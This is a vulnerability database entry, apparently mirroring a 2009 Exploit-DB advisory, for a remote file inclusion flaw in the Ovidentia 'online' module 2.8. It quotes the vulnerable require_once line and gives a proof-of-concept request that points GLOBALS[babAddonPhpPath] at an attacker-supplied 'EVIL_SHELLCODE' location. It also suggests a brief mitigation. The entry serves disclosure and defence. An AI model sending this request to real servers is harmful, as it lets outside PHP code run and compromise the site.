Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability

vendor:

Module online

by:

bd0rk

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Module online

Affected Version From: 2.8

Affected Version To: 2.8

Patch Exists: YES

Related CWE: N/A

CPE: ovidentia:online

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability

The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once. So it's possible to compromise the web-server about it. An attacker can inject s0me php-shellcode. I think, it's a big problem in this web-software!

Mitigation:

Declare the vulnerable parameter or use an alert.

Source

Exploit-DB raw data:

# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832

PoC:
/online-2-8/programs/admin.php line 2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once( $GLOBALS['babAddonPhpPath']."functions.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?

Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
             So it's possible to compromise the web-server about it.
             An attacker can inject s0me php-shellcode.
             I think, it's a big problem in this web-software!

Patch: You can declare the vulnerable parameter or use an alert.


~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~